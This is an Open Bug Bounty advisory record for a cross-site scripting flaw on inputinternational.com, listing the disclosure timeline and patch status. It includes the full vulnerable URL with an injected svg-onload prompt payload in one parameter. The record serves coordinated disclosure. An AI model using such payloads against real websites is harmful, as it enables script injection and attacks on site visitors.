inputinternational.com XSS vulnerability

2015-12-09T13:46:00
ID OBB:114815
Type openbugbounty
Reporter Spam404
Modified 2017-07-26T10:53:00

Description

Vulnerable URL:
http://www.inputinternational.com/www/PressRoom/PictureArchive/orderpicture.cfm?message=Roger%20Janssens%2010-Aug-2007%20ANL%20Plastics&UrlBigpicture;=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E&UrlThumbnail;=Roger%20Janssens%20kl.jpg&orientation;=1
Details:

Description| Value
---|---
Patched:| Yes, at 26.07.2017
Latest check for patch:| 26.07.2017 10:53 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 1
VIP website status:| No
Check inputinternational.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 9 December, 2015 13:46 GMT
Vulnerability existence verified and confirmed| 9 December, 2015 13:48 GMT
Vulnerability details disclosed by researcher| 2 March, 2016 14:11 GMT
Vulnerability patched by the website owner| 26 July, 2017 10:53 GMT